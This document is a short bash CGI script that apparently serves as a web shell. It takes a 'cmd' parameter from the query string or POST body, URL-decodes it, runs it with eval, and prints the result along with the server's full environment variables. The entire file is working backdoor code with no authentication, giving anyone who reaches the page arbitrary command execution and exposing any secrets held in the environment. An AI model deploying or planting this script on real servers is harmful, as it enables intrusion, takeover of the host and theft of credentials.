#!/bin/bash
echo -e "Content-type: text/html\n\n"

if [ "$REQUEST_METHOD" = "POST" ]; then
	read QUERY_STRING
fi

urldecode() {
	echo -e "$(sed 's/+/ /g; s/%/\\x/g')"
}

echo "========================================"
echo "Result:"
echo "========================================<BR>"
# eval $(echo "$QUERY_STRING" | sed 's|cmd=||' | sed 's/+/ /g')
eval $(echo "$QUERY_STRING" | sed 's|cmd=||' | urldecode)
echo "<BR>"

echo "========================================"
echo "Environment:"
echo "========================================<BR>"
env
echo ""
